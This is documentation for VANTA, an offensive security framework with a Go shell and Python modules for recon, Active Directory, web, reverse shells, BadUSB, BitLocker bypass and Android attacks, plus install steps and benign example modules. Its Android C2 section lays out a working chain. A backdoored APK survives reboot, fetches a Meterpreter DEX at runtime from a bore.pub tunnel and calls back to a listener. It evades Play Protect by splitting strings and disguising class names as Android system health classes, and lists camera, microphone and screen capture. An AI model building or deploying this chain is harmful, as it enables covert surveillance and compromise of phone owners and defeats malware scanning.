VANTA Documentation

VANTA is a modular offensive security framework built around a Go REPL shell and Python-driven modules. Each module is a self-contained tool that receives targets and parameters over stdin and returns structured findings over stdout. The shell handles dispatch, tab-completion, session tracking, and live module reloading.

Install: git clone https://github.com/0xb0rn3/vanta && cd vanta && bash install.sh

Complete Learning Manual - 12000+ lines
VANTA Complete Manual v0.0.1 - All Foundations, Languages, Hardware, AI/LLM, Tools
CPU internals - x86 ASM - buffer overflows - Python/Bash/Go/C/PowerShell/JS/PHP - hardware - USB/HID - ARM/Android/iOS - steganography - fuzzing - pentest toolchain - LLM security - CTF prep

01 Current Project

VANTA Modules

Stable
netrecon
Network · Recon
Multi-engine network reconnaissance. Combines nmap, masscan, rustscan with host profiling, CVE mapping, IoT device detection, MQTT/RTSP probing, ICS/SCADA identification, and geolocation.
nmap · masscan · rustscan · iot · cve · geo
Stable
android_pentest
Mobile · Android
Complete Android pentest suite — 39 operations across static analysis, smali patching, boot receiver persistence, WAN C2 with DexClassLoader staging, Frida/Objection instrumentation, QR delivery, live screen mirror, camera stream, mic recording, and a full web GUI (mode=gui) including the C2 dashboard and Live Media tab
adb · apktool · dexclassloader · bore · frida · qr · live-media
Stable
iot_pwn
Network · IoT
IoT and router exploitation module. Tests default credentials across SSH, Telnet, FTP, and HTTP admin panels. SNMP community brute-force, UPnP SSDP exposure detection, RTSP no-auth checks, and known router CVE probing (Huawei, Zyxel, Arcadyan, D-Link).
iot · router · default-creds · snmp · rtsp · cve
Docs Soon
ios_pentest
Mobile · iOS
iOS security testing via libimobiledevice and Frida. IPA static analysis, binary protection checks, ATS audit, SSL bypass, keychain dumping, and live CVE assessment via NVD.
ideviceinfo · libimobiledevice · frida · ipa · cve
Stable
mac_spoof
Network · Anonymity
Per-interface MAC address rotation with active connection tracking. Smart, session, periodic, and aggressive rotation modes. Graceful DHCP renewal and state persistence.
mac · spoofing · anonymity · network
Beta
wifi_monitor
Network · Wireless
Passive WiFi network monitor. Discovers hosts, fingerprints device types (IoT cameras, routers, NAS, databases), detects exposed services, maps CVEs, and exports structured JSON reports.
wifi · arp · fingerprint · iot · cve
Stable
adsec
Network · Active Directory
Linux-side Active Directory pentest module. Unauthenticated discovery, LDAP enum, Kerberoasting, AS-REP roasting, BloodHound collection, secretsdump, lockout-aware spraying, and a safe auto-pipeline.
ldap · kerberoast · asreproast · bloodhound · impacket · nxc
Stable
winadsec
Windows · Active Directory
Full-chain Windows Active Directory pentest and post-exploitation. Unauthenticated discovery through UAC bypass, WMI persistence, Sliver C2 session management, and end-to-end ISO payload delivery generation.
ad · sliver · wmi · uac-bypass · iso · c2
Stable
websec
Web · Offensive
Full-stack web attack surface tool. DNS/WHOIS/SSL OSINT, security headers, CORS, cookies, directory brute-force, SQLi (error + time-blind), XSS, CSRF, 403 bypass, open redirect, framework CVEs (Jira/AEM/Confluence), WAF fingerprinting, web spidering, and Google dorks. PHP payload generation, msfvenom web payloads, fuzzing, and Burp Suite export.
osint · sqli · xss · csrf · 403bypass · cve · waf · fuzzing
Stable
ctfpwn
CTF · Autopwn
Syncs github.com/0xb0rn3/CTFs, lists all rooms sorted newest first, runs standalone autopwn scripts against a target, auto-extracts flags (THM{}/HTB{}), and saves run logs to ~/ZX01C/CTF/. Tracks new rooms between pulls.
ctf · tryhackme · hackthebox · autopwn · flags
Stable
revshell
Network · C2
Multi-mode reverse shell generator and live handler. Generates payloads for bash, Python, PowerShell, netcat, PHP, and 30+ other types. Auto-starts listener on configured port. Includes msfvenom wrapper for staged and stageless Meterpreter payloads across all platforms.
shell · listener · msfvenom · powershell · payload
Stable
badusb
Hardware · USB
BadUSB attack payload generator and deployer. Generates DuckyScript and HID payloads for USB Rubber Ducky, Digispark, and Teensy boards. Produces Windows PowerShell droppers, Linux persistence oneliners, and macOS payloads. Supports staged delivery via HTTP server.
hid · duckyscript · rubber-ducky · digispark · usb
Stable
bitlocker
Hardware · Physical
Full-chain BitLocker bypass module. USB deploy, YellowKey attack, BitPixie (CVE-2023-21563), cold boot memory extraction, TPM LPC bus sniffing, DMA via PCILeech, AD recovery key extraction, and Eclipse chain payload generation. Physical access exploitation suite.
bitlocker · tpm · dma · cold-boot · pcileech · cve-2023-21563

02 How It Works

Architecture

VANTA is split into two layers: a Go REPL shell that handles all user interaction, and Python (or Bash) modules that do the actual work. The shell never embeds tool-specific logic — it only knows how to load modules, manage parameters, and route stdin/stdout. This keeps the binary small (~4 MB) and makes adding new modules as simple as dropping a Python file into the right directory.

User · Terminal: REPL commands, tab-completion, param editing
Binary · VANTA (Go): command parser, module loader, session tracker
Protocol · stdin JSON: {"target":"…", "params":{…}}
Module · Python script: reads stdin, runs operations, writes JSON out
Output · findings JSON: {"findings":[…], "errors":[…], "logs":[…]}
01
Module Discovery
At startup the shell walks tools/ and loads every module.json it finds. Each JSON file declares the module's name, description, entry-point binary, accepted parameters, and required dependencies. The shell never executes anything until run is called.
02
Parameter Model
Every value the user sets with set is stored in the shell's in-memory param map. When run is called the shell serialises the map plus the target into a single JSON object and writes it to the module's stdin.
03
Output Contract
Modules write UTF-8 lines to stdout. Lines starting with FINDING: are parsed as JSON findings. Lines starting with LOG: become log entries. Everything else streams directly to the terminal as progress output.
04
Session Tracking
The shell maintains a live session registry. Meterpreter sessions opened through android_pentest are tracked by PID and metadata. Use sessions list, sessions interact <id>, or sessions kill <id>.

Directory Layout

The repository follows a consistent structure. The Go shell binary lives at the root. All modules live under tools/, grouped by category. Each module folder contains a module.json and one or more Python scripts.

VANTA/
├── VANTA                       # compiled Go REPL binary
├── main.go                    # shell source - REPL loop, command parser, module loader
├── install.sh                 # multi-distro dependency installer (pacman/apt/dnf/zypper/apk)
├── rqm.md                     # global requirements manifest — all modules, all distros
├── update.py                  # git pull + rebuild + sync_tools()
├── gen_module.py              # scaffold a new module interactively
├── tools/
│   ├── network/
│   │   ├── netrecon/          # multi-engine network recon
│   │   │   ├── module.json
│   │   │   └── netrecon.py
│   │   ├── mac_spoof/         # per-interface MAC rotation
│   │   └── wifi_monitor/      # passive WiFi host discovery
│   ├── mobile/
│   │   ├── android/           # APK backdoor + WAN C2 + Frida
│   │   │   ├── module.json
│   │   │   ├── android_pentest.py
│   │   │   ├── apk_backdoor/
│   │   │   │   ├── build_bootbuddy.py
│   │   │   │   ├── AgentService.smali
│   │   │   │   └── output/
│   │   │   └── c2_persistence/
│   │   │       ├── c2_watchdog.sh
│   │   │       └── vanta-c2.service
│   │   └── ios/               # iOS pentest via libimobiledevice + Frida
│   │       ├── module.json
│   │       └── ios_pentest.py
│   ├── web/
│   │   └── websec/            # full-stack web attack surface
│   ├── AD/
│   │   ├── linux/             # adsec — Linux-side AD pentest (15 ops)
│   │   │   ├── module.json
│   │   │   └── adsec.py
│   │   └── windows/           # winadsec — Windows AD post-exploitation (37 ops)
│   │       ├── module.json   # inputs + operations schema
│   │       └── winadsec.py
│   └── ctf/
│       └── ctfpwn.py          # CTF autopwn + flag extraction

03 Code Deep Dive

Internals

This section explains how the key pieces of VANTA work at the code level. It is intended for people who want to understand, extend, or audit the framework — not just use it.

The REPL Loop (main.go)

The shell is a standard Go read-eval-print loop. On each iteration it prints a prompt, reads a line, tokenises it, and dispatches to a handler. The prompt is built dynamically: it shows the loaded module name and count of currently-set parameters so you always know your context at a glance.

// Simplified prompt construction - actual code in main.go
func buildPrompt(mod *Module, params map[string]string) string {
    if mod == nil {
        return "vanta ❯ "
    }
    op := params["operation"]
    n  := len(params)
    if op != "" {
        return fmt.Sprintf("VANTA %s › %s [%d params] ❯ ", mod.Name, op, n)
    }
    return fmt.Sprintf("VANTA %s ❯ ", mod.Name)
}

Module Loading (module.json)

Every module directory contains a module.json that the shell reads at startup (and on reload). The JSON defines everything the shell needs to know about the module — no code is executed at load time.

// Example module.json (android_pentest, abbreviated)
{
  "name":        "android_pentest",
  "version":     "1.0.0",
  "category":   "mobile",
  "description": "Complete Android penetration testing suite",
  "author":      "VANTA Team | 0xb0rn3",
  "executable":  "python3 android_pentest.py",
  "dependencies": ["python3", "adb"],
  "inputs": {
    "operation": {
      "type":     "string",
      "required": false,
      "default":  "recon",
      "description": "Operation: recon, app_scan, vuln_scan, rebuild, full_pwn ..."
    },
    "package": {
      "type":     "string",
      "required": false,
      "description": "Target package name for app-specific operations"
    }
  }
}

The stdin/stdout Protocol

Shell → Module (stdin)
{
  "target": "192.168.1.1",
  "params": {
    "operation": "recon",
    "mode":      "deep",
    "threads":   "30"
  }
}
Module → Shell (stdout)
# Progress → terminal
[*] Scanning 192.168.1.1...
[+] Port 22 open - OpenSSH 8.9

# Findings → parsed by shell
FINDING: {"category":"open_port","port":22,"service":"ssh"}

# Logs → stored in session
LOG: scan completed in 4.2s

How a Python Module Receives Data

import json, sys

# Read the shell's dispatch payload
data   = json.loads(sys.stdin.readline())
target = data.get("target", "")
params = data.get("params", {})
op     = params.get("operation", "recon")

# Dispatch table (excerpt from a method of the module class, so self is the module instance)
ops = {
    "recon":           self._recon_operation,
    "static_analysis": self._static_analysis_operation,
    "backdoor_apk":    self._backdoor_apk_operation,
}

handler = ops.get(op)
if handler:
    handler()

# Emit all collected findings
for f in self.findings:
    print(f"FINDING: {json.dumps(f)}")

04 Android C2

C2 Stack & APK Persistence

The Android persistence chain is the most technically complex part of VANTA. It uses several layered techniques to achieve boot-persistent Meterpreter sessions over WAN without embedding any detectable payload statically in the APK.

Design goal: The rebuilt APK must pass Play Protect static analysis, survive a device reboot, fetch the real Meterpreter payload from a WAN endpoint without storing it on disk permanently, and open a session through carrier NAT.

The Four-Layer Chain

01
Boot Persistence → BOOT_COMPLETED receiver
The boot persistence APK is patched by build_bootbuddy.py. The BootReceiver.onReceive() smali is modified to call startForegroundService(AgentService) immediately on BOOT_COMPLETED. A foreground service is necessary from API 26+ because background service starts from broadcast receivers are blocked.
02
AgentService → foreground service context
AgentService.smali is injected into the APK. Its onStartCommand() creates a notification channel, calls startForeground() to satisfy API 28+ requirements, then invokes BootReceiver.launchAgent() and Payload.start(context) in a daemon thread.
03
DexClassLoader Payload → runtime DEX fetch
com.android.system.health.Payload opens a URL connection to http://bore.pub:21062/s.dex, writes bytes to getCodeCacheDir()/s.dex, loads it with DexClassLoader, and calls com.metasploit.stage.Payload.start(context) via reflection. On failure it sleeps 5s and retries indefinitely.
04
s.dex → reverse_http Meterpreter via bore tunnel
s.dex is generated by msfvenom -p android/meterpreter/reverse_http targeting bore.pub:37993. reverse_http survives carrier NAT and DPI more reliably on mobile networks than reverse_tcp.

c2_watchdog.sh — The Stack Manager

HTTP
DEX file server
python3 -m http.server 8080 serving the output/ directory. Serves both s.dex and rebuilt.apk.
BORE
DEX bore tunnel
bore local 8080 --to bore.pub --port 21062 — the device's DexClassLoader fetches s.dex through this URL.
BORE
MSF bore tunnel
bore local 4444 --to bore.pub --port 37993 — the Meterpreter in s.dex calls back through this tunnel.
MSF
msfconsole handler
msfconsole -q -r handler.rc running multi/handler on 0.0.0.0:4444 with payload android/meterpreter/reverse_http.
# Start the full C2 stack
bash tools/mobile/android/c2_persistence/c2_watchdog.sh \
  --bore-dex-port 21062 \
  --bore-msf-port 37993 \
  --msf-port      4444  \
  --dex-dir       tools/mobile/android/apk_backdoor/output/ \
  --notify

# Or as a systemd service
sudo systemctl enable --now vanta-c2
sudo journalctl -u vanta-c2 -f

Play Protect Evasion

A
No static Meterpreter in APK
The APK contains only the DexClassLoader fetcher. Play Protect's static DEX scanner finds nothing to flag because there are no Metasploit signatures in the installed package. The real payload is fetched at runtime to getCodeCacheDir() which is not scanned during boot.
B
URL split across two string constants
The smali for the DEX fetch URL is const-string v0, "http://bore" + const-string v1, ".pub:21062/s.dex" concatenated at runtime, defeating single-string-constant matching scanners.
C
ProcessBuilder + split command string
Uses ProcessBuilder (less heuristically flagged than Runtime.exec()) and splits the shell command string at the midpoint, concatenated at runtime via String.concat().
D
Disguised class names
DexClassLoader class placed at com.android.system.health.Payload. AgentService embedded in the boot persistence APK at com.android.system.health.AgentService.

05 Shell Reference

VANTA Shell

Module Commands v0.0.1 k4ng
v0.0.1 k4ng Features
setg <param> <value>      Set a global parameter that persists across all module switches for the session
unsetg <param>            Clear a global parameter. show global lists all active globals.
run (no target)           Bare run reuses the last target automatically - no need to retype the IP
options                   Shortcut for show options
modules                   Shortcut for show modules

Loading Modules
use <module>              Load a module by name. Tab completes module names from the tools/ discovery scan.
back                      Unload the current module and clear params. Equivalent to cd ..
reload                    Rescan the tools directory for new or updated modules without restarting

Configuration
set <param> <value>       Set a module parameter. Values with spaces do not need quotes. e.g. set operation backdoor_apk
unset <param>             Clear a single parameter
show options              List all parameters: name, type, required flag, current value, and help text

Execution
run <target>              Execute the loaded module. Target is an IP, hostname, device serial, domain, or keyword (connected, device)

Information
show modules              List all available modules grouped by category
info [module]             Module details, version, author, dependency status, and example commands
search <keyword>          Search modules by name, description, category, or tag
sessions [list|interact <id>|kill <id>]   Manage active Meterpreter / shell sessions opened through android_pentest

Maintenance
update                    Pull the latest version from git — rebuilds binary, syncs tool permissions
clear                     Clear the terminal screen
exit / quit               Exit VANTA

Linux Navigation native passthrough

All standard Linux commands work natively inside VANTA. The shell passes unknown commands through to the OS via exec.Command.

Directory Navigation
cd <dir>                  Change working directory
cd .. / cd ../            Go up one level. If a module is loaded, acts as back
pwd                       Print current working directory

File Operations
ls [path]                 List directory contents
ll / la                   Long listing with hidden files
mv / cp / rm              Move, copy, or delete files

Viewing & Search
cat / less                Print or page file contents
grep "<pattern>" <file>   Search file contents
find <path> -name "…"     Find files by name or pattern

Prompt Reference
# No module loaded
VANTA ❯

# Module loaded, no params set
VANTA android_pentest ❯

# Module loaded, operation set, 3 params
VANTA android_pentest › rebuild [3 params] ❯

# Scan in progress
VANTA netrecon › full [3 params] ❯

06 Getting Started

Quickstart

01
Install VANTA
Clone the repo and run the install script. It detects your distro, installs missing dependencies, compiles the Go binary, and makes all module scripts executable.
git clone https://github.com/0xb0rn3/vanta
cd vanta
bash install.sh
02
Launch the shell
Run the VANTA binary. It auto-scans tools/ and loads all modules with tab-completion.
./vanta     # from repo directory
vanta       # if installed system-wide
03
Network recon
Scan a subnet, enumerate hosts, map open ports, detect device types, and pull live CVEs from NVD.
use netrecon
set mode deep
set threads 30
run 192.168.1.0/24
04
Android WAN C2 (boot persistence)
Patch boot persistence APK, generate s.dex, get QR for delivery. Device connects back on every reboot via bore tunnels.
use android_pentest
set operation rebuild
set msf true
set msf_lport 4444
run device     # builds APK + s.dex + QR

# Start C2 stack
bash tools/mobile/android/c2_persistence/c2_watchdog.sh \
  --bore-dex-port 21062 --bore-msf-port 37993 \
  --msf-port 4444 --dex-dir tools/mobile/android/apk_backdoor/output/ --notify
05
WiFi network monitoring
Discover all hosts on a WiFi segment, fingerprint device categories, detect exposed threats like Telnet, FTP, or Redis.
use wifi_monitor
set mode full
set interface wlan0
run 192.168.1.0/24
06
Navigate like Linux
Use back or cd .. to unload a module. Regular Linux commands work directly.
ls tools/network/
cat tools/network/netrecon/module.json
back
python3 update.py --sync-tools

07 Zero to Exploit

Foundations

VANTA is a command-line security framework. If you are new to terminals, shells, or what these tools do under the hood — this section builds the mental model. Experienced readers can skip to Quickstart.

01
Terminal
The window that accepts your text and shows output. xterm, Alacritty, Windows Terminal, and the VS Code integrated terminal are all terminals. When you run VANTA you are inside one.
02
Shell
The program running inside the terminal. It reads commands, finds the right binary, runs it, and shows output. bash and zsh are shells. VANTA is also a shell — a specialised one for security operations with its own REPL loop.
03
Binary / Executable
A compiled program stored as a file on disk. When you run ./vanta the OS loads that file into RAM and executes it. The VANTA binary is written in Go and compiles to ~4 MB.
04
stdin / stdout
Every running process has three default streams: stdin (input), stdout (normal output), stderr (errors). VANTA uses stdin to send parameters to modules and reads their findings back over stdout.
05
JSON
JavaScript Object Notation — a human-readable data format: {"key": "value"}. VANTA sends a JSON object to each module's stdin and expects JSON findings back. Not tied to JavaScript — every language reads and writes it.
06
Ports
A numbered endpoint on a network interface (0–65535). Servers listen on specific ports: SSH on 22, HTTP on 80, HTTPS on 443. When VANTA scans a target it probes which ports are open and what service is behind each one.
07
Dependencies
External tools a module needs. android_pentest depends on adb, apktool, and metasploit-framework. The shell checks each with which at load time and warns before you run an operation that needs a missing tool.
08
Security Module
In VANTA, a module is a Python (or Bash) script that implements one category of attack or analysis. It reads a JSON target and parameters from stdin, runs tools like nmap or adb, and writes structured findings back to stdout.

Common Ports Quick Reference

Infrastructure Services
Port  Service   Purpose
22    SSH       Secure remote shell
23    Telnet    Unencrypted remote shell
21    FTP       File transfer (plain)
25    SMTP      Email sending
53    DNS       Name resolution
161   SNMP      Device management (UDP)

Web & Directory Services
Port  Service   Purpose
80    HTTP      Web (unencrypted)
443   HTTPS     Web (TLS)
389   LDAP      Active Directory queries
636   LDAPS     LDAP over TLS
445   SMB       Windows file sharing
88    Kerberos  AD authentication tickets

What Happens When You Run a Module

01
You type: use android_pentest → set operation recon → run 192.168.1.5
The VANTA shell reads three commands. use loads the module manifest from tools/mobile/android/module.json. set stores "operation=recon" in an in-memory map. run begins execution.
02
Shell serialises parameters to one JSON line
Builds: {"target":"192.168.1.5","params":{"operation":"recon"}} and writes it to the module process's stdin pipe. The module reads exactly one line and blocks until it arrives.
03
Module receives JSON and dispatches
android_pentest.py parses the line, extracts operation="recon", calls the corresponding function, and runs adb devices and other recon tools — printing progress to stdout as it goes.
04
Shell streams output and collects findings
Plain progress lines print directly to your terminal. Lines prefixed FINDING: are parsed as structured JSON and stored in the session. When the module exits the shell shows a finding count summary.

08 For Developers

Build a Module

VANTA modules are Python scripts (Bash and Go work too) dropped into tools/ alongside a module.json manifest. No shell modifications are needed. Drop the files in, type reload inside VANTA, and the module appears in tab-completion.

Minimum File Layout

tools/
└── network/
    └── portcheck/               # new module folder
        ├── module.json            # manifest (required)
        └── portcheck.py            # entry-point script

module.json — Full Specification

{
  "name":        "portcheck",          // unique module ID — matches folder name
  "version":     "1.0.0",              // semver
  "category":   "network",             // folder category used for grouping
  "description": "Check if a TCP port is open",
  "author":      "you",
  "executable":  "python3 portcheck.py", // command the shell spawns
  "dependencies": ["python3"],           // checked with `which` at load time
  "optional_dependencies": {            // hints shown — not required to load
    "nmap": "pacman -S nmap"
  },
  "timeout": 120,                       // seconds before shell kills process
  "inputs": {
    "port": {
      "type":        "string",            // string | int | bool | choice
      "required":    true,
      "description": "TCP port to check"
    },
    "timeout_sec": {
      "type":        "int",
      "required":    false,
      "default":     "5",
      "description": "Connection timeout in seconds"
    }
  }
}
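
A manifest check to run on a dropped-in module.json before typing reload, written as an added example (not code from the VANTA repository). The required-key set, the shell-metacharacter rule and the stay-inside-the-module-folder rule are assumptions of this example, and the sample manifests are constructed; note that Python's json parser rejects the // annotations used in the specification above.

```python
import json
import shlex
import shutil

# Keys named in the Module Discovery step; requiring all five is this example's assumption.
REQUIRED = {"name": str, "description": str, "executable": str,
            "dependencies": list, "inputs": dict}
ALLOWED_TYPES = {"string", "int", "bool", "choice"}  # from the spec's type comment
SHELL_META = set(";|&$`<>\n")


def _lint_executable(exe):
    """The executable is what the shell spawns on run, so check it closely."""
    issues = []
    if SHELL_META & set(exe):
        issues.append("executable: contains shell metacharacters")
    try:
        argv = shlex.split(exe)
    except ValueError:
        return issues + ["executable: unbalanced quotes"]
    for arg in argv[1:]:
        # Assumed policy: script arguments stay inside the module folder.
        if arg.startswith("/") or ".." in arg.split("/"):
            issues.append(f"executable: argument leaves the module folder: {arg}")
    return issues if argv else issues + ["executable: empty command"]


def _lint_input(name, spec):
    if not isinstance(spec, dict):
        return [f"inputs.{name}: expected an object"]
    issues = []
    typ = spec.get("type")
    if not isinstance(typ, str) or typ not in ALLOWED_TYPES:
        issues.append(f"inputs.{name}: unknown type {typ!r}")
    if "required" in spec and not isinstance(spec["required"], bool):
        issues.append(f"inputs.{name}: required must be true or false")
    if typ == "int" and "default" in spec:
        try:
            int(spec["default"])  # defaults are written as strings, e.g. "5"
        except (TypeError, ValueError):
            issues.append(f"inputs.{name}: default {spec['default']!r} is not an int")
    return issues


def lint_manifest(text, which=shutil.which):
    """Return a list of problems in a module.json body; an empty list means clean."""
    try:
        m = json.loads(text)
    except json.JSONDecodeError as e:
        return [f"invalid JSON at line {e.lineno}: {e.msg}"]
    if not isinstance(m, dict):
        return ["top level is not a JSON object"]
    issues = []
    for key, typ in REQUIRED.items():
        if key not in m:
            issues.append(f"missing key: {key}")
        elif not isinstance(m[key], typ):
            issues.append(f"{key}: expected {typ.__name__}")
    if isinstance(m.get("executable"), str):
        issues += _lint_executable(m["executable"])
    for dep in m["dependencies"] if isinstance(m.get("dependencies"), list) else []:
        if not isinstance(dep, str):
            issues.append(f"dependencies: non-string entry {dep!r}")
        elif which(dep) is None:  # the PATH lookup the shell does with which
            issues.append(f"dependency not on PATH: {dep}")
    t = m.get("timeout")
    if t is not None and (isinstance(t, bool) or not isinstance(t, int) or t <= 0):
        issues.append("timeout: expected a positive number of seconds")
    for name, spec in (m["inputs"] if isinstance(m.get("inputs"), dict) else {}).items():
        issues += _lint_input(name, spec)
    return issues


# Constructed sample manifests (not files from the VANTA repository).
SAMPLE_OK = """{
  "name": "portcheck",
  "description": "Check if a TCP port is open",
  "executable": "python3 portcheck.py",
  "dependencies": ["python3"],
  "timeout": 120,
  "inputs": {
    "port": {"type": "string", "required": true},
    "timeout_sec": {"type": "int", "required": false, "default": "5"}
  }
}"""
# The same manifest with a documentation-style // annotation left in.
SAMPLE_ANNOTATED = SAMPLE_OK.replace('"portcheck",', '"portcheck",  // module ID', 1)
SAMPLE_BAD = """{
  "name": "portcheck",
  "executable": "python3 ../shared/run.py | tee out.log",
  "dependencies": ["python3", "nmap"],
  "timeout": 0,
  "inputs": {"port": {"type": "float"},
             "timeout_sec": {"type": "int", "default": "five"}}
}"""

if __name__ == "__main__":
    for label, text in (("ok", SAMPLE_OK), ("bad", SAMPLE_BAD)):
        print(label, lint_manifest(text))
```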

Complete Python Module Example

A complete, working portcheck module. The only required pattern: read one JSON line from stdin on startup, dispatch on params, print progress to stdout, prefix structured results with FINDING:.

#!/usr/bin/env python3
import json, sys, socket

# ── Read dispatch payload from shell ──────────────────────────────
data   = json.loads(sys.stdin.readline())
target = data.get("target", "")
params = data.get("params", {})
port   = int(params.get("port", 80))
t_sec  = int(params.get("timeout_sec", 5))

# ── Progress lines stream directly to terminal ────────────────────
print(f"[*] Checking {target}:{port} (timeout={t_sec}s)", flush=True)

try:
    s = socket.create_connection((target, port), timeout=t_sec)
    s.close()
    status = "open"
    print(f"[+] Port {port} is OPEN", flush=True)
except (socket.timeout, ConnectionRefusedError):
    status = "closed"
    print(f"[-] Port {port} is CLOSED", flush=True)
except Exception as e:
    status = "error"
    print(f"[!] Error: {e}", flush=True)

# ── FINDING lines are parsed by the shell into session ────────────
print(f"FINDING: {json.dumps({'host': target, 'port': port, 'status': status})}")
print(f"LOG: portcheck completed for {target}:{port}")

Bash Module Example

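#!/usr/bin/env bash
# Read exactly one JSON line (the dispatch payload) and parse it with jq
IFS= read -r PAYLOAD
TARGET=$(echo "$PAYLOAD" | jq -r '.target')
PORT=$(echo   "$PAYLOAD" | jq -r '.params.port // "80"')

# Reject a non-numeric port before it is used in the /dev/tcp path
case "$PORT" in
  ''|*[!0-9]*) echo "[!] Invalid port: $PORT"; exit 1 ;;
esac

echo "[*] Checking $TARGET:$PORT"

# Target and port are passed as positional arguments, so the inner shell
# never parses payload values as code
if timeout 5 bash -c 'echo > "/dev/tcp/$1/$2"' _ "$TARGET" "$PORT" 2>/dev/null; then
  STATUS="open"; echo "[+] Port $PORT OPEN"
else
  STATUS="closed"; echo "[-] Port $PORT CLOSED"
fi

# -c keeps the finding on a single line, as the output contract requires
echo "FINDING: $(jq -nc --arg h "$TARGET" --arg p "$PORT" --arg s "$STATUS" \
  '{host:$h,port:$p,status:$s}')"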

Bare Metal OS Setup

VANTA runs directly on the metal — no containers, no VMs, no abstraction layers. The Go binary and Python modules call real system tools (adb, nmap, msfconsole, bore) that must be present on the host. This section is the authoritative installation reference for every supported platform.

Minimum Hardware Requirements

CPU
x86_64 or ARM64
Any modern 64-bit processor. ARM64 (Apple Silicon, Raspberry Pi 5, phone boards) is supported — build from source. No minimum clock speed; scan performance scales linearly with core count.
RAM
4 GB minimum · 8 GB recommended
Metasploit Framework alone requires ~1 GB at rest. Running concurrent netrecon + android_pentest + msfconsole comfortably needs 6–8 GB. 4 GB is the hard floor for basic usage.
DISK
20 GB free
Metasploit + apktool + Go toolchain + module outputs account for ~12 GB. Leave 8 GB headroom for APK builds, scan logs, DEX files, and captured media from android_pentest.
NET
Ethernet + Wi-Fi adapter
wifi_monitor requires a wireless adapter that supports monitor mode and packet injection. Most Alfa adapters (AWUS036ACH, AWUS036NHA) work out of the box. Internal adapters rarely support monitor mode on laptops.
USB
USB 2.0 or higher
Android pentest requires a physical USB port for ADB. badusb payload deployment requires a USB port for the HID device (Rubber Ducky, Digispark). Do not run android_pentest through a passive USB hub.
OS
Linux only
Arch Linux / CachyOS (primary), Kali Linux (secondary), Debian/Ubuntu, Fedora, and Alpine. macOS partial (no wifi_monitor, no udev). Windows is not supported. WSL2 lacks ADB passthrough — use bare metal.

System Package Installation

Install all required system packages before running install.sh. The install script detects your package manager and runs the correct command automatically — but if you prefer to install manually, use the table below. All packages must be system-wide; do not use user-local or sandboxed installations.

Arch Linux / CachyOS / Manjaro
sudo pacman -Syu
sudo pacman -S \
  go python python-pip git \
  android-tools apktool \
  nmap masscan jq bore \
  aircrack-ng iw wireless_tools \
  metasploit frida \
  imagemagick ffmpeg \
  impacket netexec bloodhound \
  python-ldap3 python-requests \
  python-paramiko python-scapy
Kali Linux / Debian / Ubuntu
sudo apt update && sudo apt install -y \
  golang-go python3 python3-pip git \
  adb apktool default-jdk \
  nmap masscan jq \
  aircrack-ng iw wireless-tools \
  metasploit-framework \
  frida-tools \
  imagemagick ffmpeg \
  impacket-scripts netexec \
  python3-ldap3 python3-requests \
  python3-paramiko python3-scapy
pip3 install frida-tools --break-system-packages

Go Toolchain and Binary Compilation

VANTA's shell is written in Go and must be compiled from source. The Go toolchain version must be 1.21 or higher. If your distro ships an older Go, install directly from go.dev.

# Verify Go version (need 1.21+)
go version

# Clone and build
git clone https://github.com/0xb0rn3/vanta
cd vanta
go build -o vanta main.go

# Make available system-wide (optional)
sudo cp vanta /usr/local/bin/vanta
sudo chmod +x /usr/local/bin/vanta

ADB and Android USB Permissions

ADB requires a udev rule so Linux grants your user access to Android USB devices without root. Without this rule, adb devices returns an empty list even when the device is plugged in with USB debugging enabled.

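# Write the udev rule (covers major Android vendor IDs)
# MODE="0666" gives every local user read/write access to these devices;
# MODE="0660" limits access to members of the plugdev group.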
sudo tee /etc/udev/rules.d/51-android.rules <<'EOF'
SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="22b8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="0bb4", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="12d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="2717", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="1004", MODE="0666", GROUP="plugdev"
EOF

sudo chmod a+r /etc/udev/rules.d/51-android.rules
sudo udevadm control --reload-rules
sudo udevadm trigger

# Add your user to plugdev group (logout/login to take effect)
sudo usermod -aG plugdev $USER

Wireless Adapter — Monitor Mode Setup

wifi_monitor requires the wireless interface to be placed in monitor mode before running. Most distros block monitor mode by default via NetworkManager. Kill interfering processes first.

# Identify your wireless interface name
ip link show                    # look for wlan0, wlp3s0, wlan1, etc.

# Kill processes that fight for the interface
sudo airmon-ng check kill

# Put the adapter into monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Verify monitor mode is active
iw dev wlan0 info | grep type   # should print: type monitor

# Restore managed mode after testing
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
sudo systemctl restart NetworkManager

Bore — NAT Bypass Tunnel

android_pentest WAN mode requires bore to punch through carrier NAT. Bore is a Rust binary — install via cargo or download the pre-built release.

# Option A — cargo (Rust must be installed)
cargo install bore-cli

# Option B — pre-built binary (Arch AUR)
yay -S bore-cli

# Option C — direct binary download
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz
sudo mv bore /usr/local/bin/bore

# Verify
bore --version

Metasploit Framework

MSF must be initialised before VANTA can use it. Run the database setup once after installation. VANTA starts msfconsole as a subprocess and communicates via RC files — it does not use the RPC API.

# Arch
sudo pacman -S metasploit

# Kali / Debian (already included in Kali)
sudo apt install metasploit-framework

# One-time database initialisation
sudo msfdb init

# Verify MSF starts clean (Ctrl+C to exit)
msfconsole -q -x "version; exit"

install.sh — What It Actually Does

01
Detects package manager
Checks for pacman, apt, dnf, zypper, and apk in order. Runs the appropriate install command for the full dependency list in rqm.md.
02
Compiles the Go binary
Runs go build -o vanta main.go. If Go is not found it exits with a clear error message rather than trying to install Go itself — Go must be on PATH before running install.sh.
03
Sets executable permissions on all module scripts
chmod +x is applied recursively to every .py and .sh file under tools/. Without this, the shell cannot spawn module processes.
04
Writes the udev rule for ADB
Creates /etc/udev/rules.d/51-android.rules with major Android vendor IDs if it does not already exist, then reloads udev. Requires sudo — the script will prompt for the password.
05
Runs dependency verification
